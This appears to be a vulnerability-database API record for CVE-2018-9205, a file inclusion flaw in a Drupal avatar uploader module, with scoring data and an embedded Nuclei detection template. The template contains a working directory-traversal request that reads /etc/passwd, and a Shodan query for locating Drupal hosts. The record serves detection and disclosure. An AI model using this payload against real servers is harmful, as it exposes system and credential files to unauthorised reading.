{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-9205/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-9205/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-9205/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-9205/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-9205/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-9205"},"sightings":{"href":"/api/v1/sightings/cve-2018-9205"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.55079,"kev":false,"percentile":0.98984},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-9205.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2018-9205\n\ninfo:\n  name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion\n  author: daffainfo\n  severity: high\n  description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.\n  impact: |\n    Unauthenticated attackers can read arbitrary files from the server, potentially exposing sensitive configuration files, credentials, and user data.\n  remediation: Upgrade to the latest version of avatar_uploader.\n  reference:\n    - https://www.exploit-db.com/exploits/44501\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-9205\n    - https://www.drupal.org/project/avatar_uploader/issues/2957966\n    - https://www.drupal.org/project/avatar_uploader\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2018-9205\n    cwe-id: CWE-22\n    epss-score: 0.55079\n    epss-percentile: 0.98984\n    cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: drupal\n    product: avatar_uploader\n    shodan-query: http.component:\"drupal\"\n  tags: cve,cve2018,lfi,drupal,edb,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022007f02ac0ee7a059b3d9c636d08fc1140ac0ad18ee005e7709065de86b370a600022100b5e8d322b180aea424be5818e29657f93deec40b465c4a646ac73f5e541d1f17:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2018-9205"}